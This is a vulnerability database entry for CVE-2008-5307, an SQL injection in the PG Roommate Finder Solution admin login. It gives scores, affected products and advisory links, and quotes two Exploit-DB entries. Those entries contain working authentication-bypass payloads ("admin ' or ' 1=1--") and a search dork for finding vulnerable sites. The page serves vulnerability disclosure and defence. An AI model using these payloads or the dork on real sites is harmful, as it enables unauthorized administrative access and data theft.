CVE-2008-5307
Published 2008-12-02
CVE-2008-5307: SQL injection vulnerability in admin/index.php in PG Roommate Finder Solution allows remote attackers to execute arbitrary SQL commands via the login_lg…
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.16% (63.2th percentile)
SQL injection vulnerability in admin/index.php in PG Roommate Finder Solution allows remote attackers to execute arbitrary SQL commands via the login_lg parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pilot_group | pg_real_roommate_finder_solution | — | — |
No detection rules found.
Exploit-DB
Pilot Group PG Roommate Finder Solution - Authentication Bypass
exploitdb·2008-11-23
CVE-2008-5307 Pilot Group PG Roommate Finder Solution - Authentication Bypass
---
[~] PG Roomate Finder Solution Auth Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 23.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] A small request: please don't hack the demos ( pls dont make hack demos )
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] NOTE: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=infinity ( I'm fed up )
[~]
[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design" ( here, a dork for you :( ( )
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
Exploit-DB
Pilot Group PG Roommate Finder Solution - SQL Injection
exploitdb·2008-11-23
CVE-2008-5307 Pilot Group PG Roommate Finder Solution - SQL Injection
---
source: https://www.securityfocus.com/bid/32430/info
Pilot Group PG Roommate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof of concept is available:
username: admin ' or ' 1=1--
password: anything
No writeups or analysis indexed.
http://secunia.com/advisories/32841
http://securityreason.com/securityalert/4678
http://www.securityfocus.com/bid/32430
http://www.vupen.com/english/advisories/2008/3238
https://exchange.xforce.ibmcloud.com/vulnerabilities/46794
https://www.exploit-db.com/exploits/7201
2008-12-02
Published